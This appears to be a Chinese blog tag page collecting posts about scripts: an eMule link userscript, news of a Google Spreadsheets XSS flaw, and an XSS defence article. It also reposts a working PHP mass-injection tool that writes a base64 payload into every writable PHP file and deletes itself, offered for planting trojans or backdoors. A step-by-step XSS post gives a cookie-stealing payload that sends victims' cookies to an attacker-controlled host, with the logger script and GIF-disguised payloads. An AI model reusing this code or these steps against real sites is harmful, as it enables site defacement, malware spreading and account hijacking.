Posts tagged 脚本
电驴链接增强[GM脚本]显示电驴链接的下载完成数和正下载数
九 2nd
电驴链接增强[GM脚本]
emule Info
显示电驴链接的下载完成数和正下载数
官方最新下载:
http://userscripts.org/scripts/show/56497
官方最新直接安装:
http://userscripts.org/scripts/source/56497.user.js
————-
http://mickeywaley-blog.googlecode.com/files/56497.user.js
电驴链接增强[GM脚本]3.0显示电驴链接的下载完成数和正下载数
———————-
http://mickeywaley-blog.googlecode.com/files/56497-3.01.user.js
0.3.1版 verycd.com only 显示电驴链接的下载完成数和正下载数
————-
软件下载 :http://www.emule-project.net (不限制搜索)
电骡资源发布点:http://emule.ppcn.net/
电驴发布点:http://www.verycd.com/ (这个软件就不要用了,功能太少,还容易挂,又限制资源搜索)
电骡发布站点: http://www.ied2k.com
Google 电子表格文档服务爆高危跨站脚本攻击漏洞
四 22nd
安全研究人员比尔·勒罗斯报告称,一起针对Google电子表格的跨站脚本攻击可能已经危及所有Google服务。当一个合法站点接受来自用户的输入但并未正确过滤输入内容时,可能会导致潜在的恶意指令注入的出现。在这种情况下,一旦攻击者获得对任何xxx.google.com站点的访问权,他们将同时可以获得对其他Google 服务的访问权,如Gmail等。
一名Google负责人承认了这一漏洞的存在,并表示“Google已经解决了这一问题”。一名Google发言人说:“Google一向严肃、认真地对待我们用户的信息安全。我们很快解决了这一缺陷,并在它并未公开之前推出了一个补丁。目前,我们尚未接到任何关于此缺陷已被利用的报告。”
PHP批量挂马脚本
三 7th
对脚本,偶是垃圾,送给用的着的人,转自红狼 批量写入档案脚本… 可以拿来挂马也能拿来当RFI的后门注入 code都写明的,有需要的请自己看后门写在$inj里面,要做base64 encode的Polymorphic 不希望这个东西被搞破坏的人拿去玩懂原理的就自个儿收下吧
代码:
<?php
set_time_limit(0);
ignore_user_abort(1);
# PHP Mass Injection Script by f3v3r ver.228
# |1| Look for PHP in directory.|2| Check injected.
# |3| Inject script. |4|Can email report to you.
$inj =”;
$log_email = 0;//change 1 enable, somehow they can trace you by this way.
$email = ‘f3v3r@cc.cc’;
$log_report = 1;
$filename = ‘__log.html’;
$delete_me = 1;
echo ‘<title>f3v3r injection toolz</title><center><strong>Defacez aint hack, r00tz r.</strong></center><br>’;
$dir = opendir(‘.’);
$site=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
while ($file = readdir($dir))
{
if (strstr($file, ‘.php’) && is_writeable($file))
{
$victim = fopen($file, ‘r+’);
$victim_read = fread($victim, filesize($file));
if (!strstr($victim_read, ‘f3v3r’))
{
fclose($victim);
unlink($file);
$new = fopen($file, ‘a+’);
$new_write = fwrite($new, base64_decode($inj) . $victim_read);
fclose($new);
echo ‘<strong>[-] injecting : ‘ . $site . ‘</strong><br>’;
echo ‘[x] injected: ‘ . $file . ‘<br>’;
if($log_email) { $log = fopen(‘__tmp’, ‘a+’); fwrite($log, ‘[x] File: ‘ . getcwd() . $file . ‘<br>’); fclose($log); }
if($log_report) { $x = fopen($filename, ‘a+’); fwrite($x, ‘[x] File: ‘ . getcwd() . $file . ‘\n’); fclose($x); }
}
}
}
closedir($dir);
if($log_email) { $report = file_get_contents(‘__tmp’); mail($email, "injection report", ‘<br>f3v3r<br> ‘ .$report, ‘From: f3v3r <f3v3r@cc.cc>’); unlink(‘__tmp’); echo ‘[x] Email Report Sent!’;}
if($delete_me) { unlink(__file__); }
exit;
?>
如何应对跨站脚本攻击
二 29th
来源:安全中国
XSS漏洞是影响最广危险最大的网页安全程序漏洞,XSS漏洞发生在程序直接把用户的数据发送到网络浏览器的时候而没有确认和编译这些内容。这就使得在浏览器中执行恶意的脚本,让黑客劫持用户数据,甚至黑掉网站,在网站中插入恶意内容,还有发动网络钓鱼和恶意软件攻击。
这些攻击通常是以Java脚本的形式出现的,可以让黑客控制所有的网页。最坏的情况就是黑客可能会盗取客户资料或是假装成银行客户。 [separator]
实例:PayPal(一种网上支付方式,可以付钱给任何有e-mail的人,主要用于个人之间的网上交易)去年就遭到攻击,黑客欺骗PayPal的用户访问另外一个页面警告客户说他们的帐户受到威胁。实际上受害者访问的是一个网络钓鱼站点然后获取了PayPal客户的注册信息,社会保险号,信用卡的详细信息。PayPal称2006年的时候已经关闭了这一漏洞。
如何保护客户:利用黑白名单来确认所有的输入数据,拒绝任何不再清单上的数据。
除此之外,需要使用适当的输出数据编码,确认程序允许检测攻击,编码可以有效阻止注入脚本在浏览器中的运行。-www.itcncom.com
跨站脚本执行漏洞代码的六点思路
一 29th
1. 构造一个提交,目标是能够显示用户Cookie信息: http://www.xxxx.net/txl/login/login.pl?username=<script>alert(document.cookie)</script>&passwd=&ok.x=28&ok.y=6
2. 如果上面的请求获得预期的效果,那么我们就可以尝试下面的请求: http://www.xxx.net/txl/login/login.pl?username=<script>window.open("http://www.notfound.org/info.php?"%2Bdocument.cookie)</script>&passwd=&ok.x=28&ok.y=6
其中http://www.xxx.org/info.php是你能够控制的某台主机上的一个脚本,功能是获取查询字符串的信息,内容如下: <?php
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."\n");
fclose($fp); [separator]
}
header("Location: http://www.xxx.net");
注:"%2B"为"+"的URL编码,并且这里只能用"%2B",因为"+"将被作为空格处理。后面的header语句则纯粹是为了增加隐蔽性。
3. 如果上面的URL能够正确运行的话,下一步就是诱使登陆xxx.net的用户访问该URL,而我们就可以获取该用户Cookie中的敏感信息。
4. <IFRAME src="ip" frameBorder=0 width=500 scrolling=noshade height=400></IFRAME>
5. 就可以自己构造一个下面的头像文件:
thiz.gif
<script>
window.location.href="http://c4st.xxx.net/tmp/info.php?’%2Bdocument.cookie;
</script>
6.新建一个x.gif,内容如下: <script>alert(document.cookie)</script>